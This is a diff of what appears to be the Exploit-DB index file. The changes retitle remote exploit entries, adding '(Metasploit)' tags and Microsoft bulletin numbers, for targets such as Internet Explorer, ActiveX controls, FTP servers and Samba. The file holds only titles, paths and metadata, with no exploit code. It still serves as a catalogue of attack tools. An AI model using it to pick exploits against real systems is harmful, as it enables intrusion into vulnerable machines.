-16578,platforms/windows/remote/16578.rb,"Microsoft Internet Explorer - createTextRange() Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16578,platforms/windows/remote/16578.rb,"Microsoft Internet Explorer - createTextRange() Code Execution (MS06-013) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16579,platforms/windows/remote/16579.rb,"Oracle Document Capture 10g - ActiveX Control Buffer Overflow
(Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16580,platforms/windows/remote/16580.rb,"HP Mercury Quality Center - ActiveX Control ProgColor Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16581,platforms/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020)",2010-08-25,Metasploit,windows,remote,0
+16581,platforms/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)",2010-08-25,Metasploit,windows,remote,0
 16582,platforms/windows/remote/16582.rb,"Symantec BackupExec Calendar Control - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16583,platforms/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16583,platforms/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16584,platforms/windows/remote/16584.rb,"RealPlayer - 'rmoc3260.dll' ActiveX Control Heap Corruption (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16585,platforms/windows/remote/16585.rb,"Sun Java - Web Start Plugin Command Line Argument Injection (Metasploit)",2010-09-21,Metasploit,windows,remote,0
 16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer - '.SMIL' Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16587,platforms/windows/remote/16587.rb,"Sun Java - Runtime New Plugin docbase Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,remote,0
 16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (Metasploit)",2010-12-14,Metasploit,windows,remote,0
+16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (MS10-018)
(Metasploit)",2010-12-14,Metasploit,windows,remote,0
 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave Player - rcsL Memory Corruption (Metasploit)",2010-10-22,Metasploit,windows,remote,0
 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (1)",2010-10-04,Metasploit,windows,remote,0
-16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - (VML) Fill Method Code Execution (Metasploit)",2010-07-03,Metasploit,windows,remote,0
+16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1)",2010-10-04,Metasploit,windows,remote,0
+16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - (VML) Fill Method Code Execution (MS06-055) (Metasploit)",2010-07-03,Metasploit,windows,remote,0
 16598,platforms/windows/remote/16598.rb,"Persits XUpload - ActiveX MakeHttpRequest Directory Traversal (Metasploit)",2010-11-11,Metasploit,windows,remote,0
-16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption (Metasploit)",2010-07-12,Metasploit,windows,remote,0
+16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption (MS10-002) (Metasploit)",2010-07-12,Metasploit,windows,remote,0
 16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution - ActiveX Control Arbitrary File Download and Execute
(Metasploit)",2010-11-24,Metasploit,windows,remote,0
 16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16602,platforms/windows/remote/16602.rb,"Macrovision Installshield Update Service - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote,0
@@ -10668,7 +10677,7 @@ id,file,description,date,author,platform,type,port
 16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata 'in_mp3.dll' - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16612,platforms/windows/remote/16612.rb,"Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16612,platforms/windows/remote/16612.rb,"Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16616,platforms/windows/remote/16616.rb,"SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
@@ -10679,7 +10688,7 @@ id,file,description,date,author,platform,type,port
 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX Exploit (Metasploit)",2010-09-25,Metasploit,windows,remote,0
 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-11-05,Metasploit,windows,remote,0
-16689,platforms/windows/remote/16689.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (2) (Metasploit)",2010-04-30,Metasploit,windows,remote,23
+16689,platforms/windows/remote/16689.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2)",2010-04-30,Metasploit,windows,remote,23
 16690,platforms/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80
 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80
 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128
@@ -10688,9 +10697,9 @@ id,file,description,date,author,platform,type,port
 16695,platforms/windows/remote/16695.rb,"Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,12203
 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,1533
 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,80
-16698,platforms/windows/remote/16698.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,Metasploit,windows,remote,0
-16699,platforms/windows/remote/16699.rb,"Outlook - ATTACH_BY_REF_RESOLVE File Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16698,platforms/windows/remote/16698.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16699,platforms/windows/remote/16699.rb,"Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16700,platforms/windows/remote/16700.rb,"Microsoft Outlook - ATTACH_BY_REF_ONLY File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16701,platforms/windows/remote/16701.rb,"MySQL yaSSL (Windows) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,3306
 16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21
 16703,platforms/windows/remote/16703.rb,"GlobalScape Secure FTP Server - Input Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
@@ -10706,7 +10715,7 @@ id,file,description,date,author,platform,type,port
 16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - (MKD) Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0
 16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100
 16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21
-16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0
+16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0
 16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - (XMD5) Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16718,platforms/windows/remote/16718.rb,"Xlink FTP Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16719,platforms/windows/remote/16719.rb,"Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,21
@@ -10715,14 +10724,14 @@ id,file,description,date,author,platform,type,port
 16722,platforms/windows/remote/16722.rb,"Xlink FTP Client - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
-16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,Metasploit,windows,remote,0
+16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD) (Metasploit)",2010-11-14,Metasploit,windows,remote,0
 16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve - FTP PORT Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5554
 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
 16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0
-16732,platforms/windows/remote/16732.rb,"httpdx - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0
+16732,platforms/windows/remote/16732.rb,"httpdx - tolog() Function Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0
 16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - Exploit
(Metasploit)",2010-04-30,Metasploit,windows,remote,21
 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote,0
 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
@@ -10730,17 +10739,17 @@ id,file,description,date,author,platform,type,port
 16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,windows,remote,0
 16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21
-16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (Metasploit)",2010-11-12,Metasploit,windows,remote,21
+16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)",2010-11-12,Metasploit,windows,remote,21
 16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
 16744,platforms/windows/remote/16744.rb,"Computer Associates License Client - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10203
 16745,platforms/windows/remote/16745.rb,"Computer Associates License Server - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10202
 16746,platforms/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093
-16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,2103
-16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow (TCP)",2010-07-25,Metasploit,windows,remote,0
-16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow Exploit (Metasploit)",2011-01-11,Metasploit,windows,remote,0
-16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0
+16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow (MS05-017) (Metasploit)",2010-05-09,Metasploit,windows,remote,2103
+16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service - extractQuotedChar() TCP Overflow (MS07-029) (Metasploit)",2010-07-25,Metasploit,windows,remote,0
+16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow Exploit (MS03-026) (Metasploit)",2011-01-11,Metasploit,windows,remote,0
+16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)",2010-07-25,Metasploit,windows,remote,0
 16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0
 16752,platforms/windows/remote/16752.rb,"Apache (mod_rewrite) - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,80
 16753,platforms/windows/remote/16753.rb,"Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,80
@@ -10754,7 +10763,7 @@ id,file,description,date,author,platform,type,port
 16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - 'ext.dll' Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,80
 16762,platforms/windows/remote/16762.rb,"BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,80
 16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)",2010-04-30,Metasploit,win_x86,remote,8000
-16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,Metasploit,windows,remote,0
+16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,windows,remote,0
 16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - Database Parameter Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,9999
 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,8080
 16767,platforms/windows/remote/16767.rb,"IA WebMail Server 3.x - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80
@@ -10774,7 +10783,7 @@ id,file,description,date,author,platform,type,port
 16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0
 16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - (Windows x86) Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0
 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
-16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80
+16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)",2010-11-22,Metasploit,multiple,remote,80
 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80
 16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7144
 16787,platforms/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0
@@ -10782,7 +10791,7 @@ id,file,description,date,author,platform,type,port
 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999
 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - 'webquery.dll' Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80
-16794,platforms/windows/remote/16794.rb,"httpdx - tolog() Function Format String (2)",2010-08-25,Metasploit,windows,remote,80
+16794,platforms/windows/remote/16794.rb,"httpdx - tolog() Function Format String (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,80
 16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0
 16796,platforms/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80
 16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
@@ -10808,7 +10817,7 @@ id,file,description,date,author,platform,type,port
 16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,2380
 16818,platforms/windows/remote/16818.rb,"YahooPOPs (YPOPS) 0.6 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,25
 16819,platforms/windows/remote/16819.rb,"SoftiaCom wMailServer 1.0 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,25
-16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,Metasploit,windows,remote,25
+16820,platforms/windows/remote/16820.rb,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)",2010-11-11,Metasploit,windows,remote,25
 16821,platforms/windows/remote/16821.rb,"Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,25
 16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,25
 16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,389
@@ -10826,7 +10835,7 @@ id,file,description,date,author,platform,type,port
 16835,platforms/linux/remote/16835.rb,"Madwifi - SIOCGIWSCAN Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
 16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0
 16837,platforms/linux/remote/16837.rb,"hplip - hpssd.py From Address Arbitrary Command Execution (Metasploit)",2010-10-09,Metasploit,linux,remote,0
-16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (2)",2011-03-03,Metasploit,linux,remote,0
+16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)",2011-03-03,Metasploit,linux,remote,0
 16839,platforms/linux/remote/16839.rb,"Borland Interbase - PWD_db_aliased() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
 16840,platforms/linux/remote/16840.rb,"Borland Interbase - open_marker_file() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
 16841,platforms/linux/remote/16841.rb,"Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
@@ -10847,13 +10856,13 @@ id,file,description,date,author,platform,type,port
 16859,platforms/linux/remote/16859.rb,"Samba (Linux) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
 16860,platforms/linux/remote/16860.rb,"Samba (Linux/x86) - chain_reply Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0
 16861,platforms/linux/remote/16861.rb,"Samba (Linux x86) - trans2open Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
-16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,Metasploit,hardware,remote,0
+16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote,0
 16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0
 16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
 16865,platforms/osx/remote/16865.rb,"Knox Arkeia Backup Client Type 77 (OSX) - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,osx,remote,0
 16866,platforms/unix/remote/16866.rb,"Apple Safari - Archive Metadata Command Execution (Metasploit)",2010-09-20,Metasploit,unix,remote,0
 16867,platforms/osx/remote/16867.rb,"Apple Mac OSX Software Update - Command Execution (Metasploit)",2010-09-20,Metasploit,osx,remote,0
-16868,platforms/hardware/remote/16868.rb,"Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,Metasploit,hardware,remote,0
+16868,platforms/hardware/remote/16868.rb,"Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,hardware,remote,0
 16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail - LibTIFF Buffer Overflow (Metasploit)",2010-09-20,Metasploit,hardware,remote,0
 16870,platforms/multiple/remote/16870.rb,"Apple Mail.app - Image Attachment Command Execution (Metasploit)",2011-03-05,Metasploit,multiple,remote,0
 16871,platforms/osx/remote/16871.rb,"Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)",2011-01-08,Metasploit,osx,remote,0
@@ -10867,7 +10876,7 @@ id,file,description,date,author,platform,type,port
 16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0
 16880,platforms/linux/remote/16880.rb,"Samba (*BSD x86) - trans2open Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0
 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
-16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP)",2010-08-25,Metasploit,linux,remote,0
+16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
 16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
 16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection (Metasploit)",2011-01-08,Metasploit,linux,remote,0
 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)",2010-10-25,Metasploit,linux,remote,0
@@ -10882,7 +10891,7 @@ id,file,description,date,author,platform,type,port
 16926,platforms/windows/remote/16926.rb,"Mercantec SoftCart - CGI Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16927,platforms/hp-ux/remote/16927.rb,"HP-UX LPD - Command Execution (Metasploit)",2010-10-06,Metasploit,hp-ux,remote,0
 16928,platforms/linux/remote/16928.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
-16930,platforms/aix/remote/16930.rb,"ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,Metasploit,aix,remote,0
+16930,platforms/aix/remote/16930.rb,"ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) (Metasploit)",2010-11-11,Metasploit,aix,remote,0
 16936,platforms/windows/remote/16936.html,"KingView 6.5.3 SCADA - ActiveX Exploit",2011-03-07,"Carlos Mario Penagos Hollmann",windows,remote,0
 16956,platforms/windows/remote/16956.rb,"Novell iPrint Client 5.52 - ActiveX Control Buffer Overflow (Metasploit)",2011-03-07,Metasploit,windows,remote,0
 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows - Payload Execution (Metasploit)",2011-03-08,Metasploit,windows,remote,0
@@ -10928,7 +10937,7 @@ id,file,description,date,author,platform,type,port
 17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0
 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption (Metasploit)",2011-04-16,Metasploit,windows,remote,0
 17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass)",2011-04-19,Abysssec,windows,remote,0
-17195,platforms/windows/remote/17195.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (2)",2011-04-19,Metasploit,windows,remote,0
+17195,platforms/windows/remote/17195.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (2)",2011-04-19,Metasploit,windows,remote,0
 17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution (Metasploit)",2011-04-21,Metasploit,unix,remote,0
 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)",2011-04-27,Metasploit,windows,remote,18821
 17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 (build 2055) - Buffer Overflow",2011-05-04,xsploitedsec,windows,remote,0
@@ -10957,7 +10966,7 @@ id,file,description,date,author,platform,type,port
 17381,platforms/windows/remote/17381.txt,"simple Web-Server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0
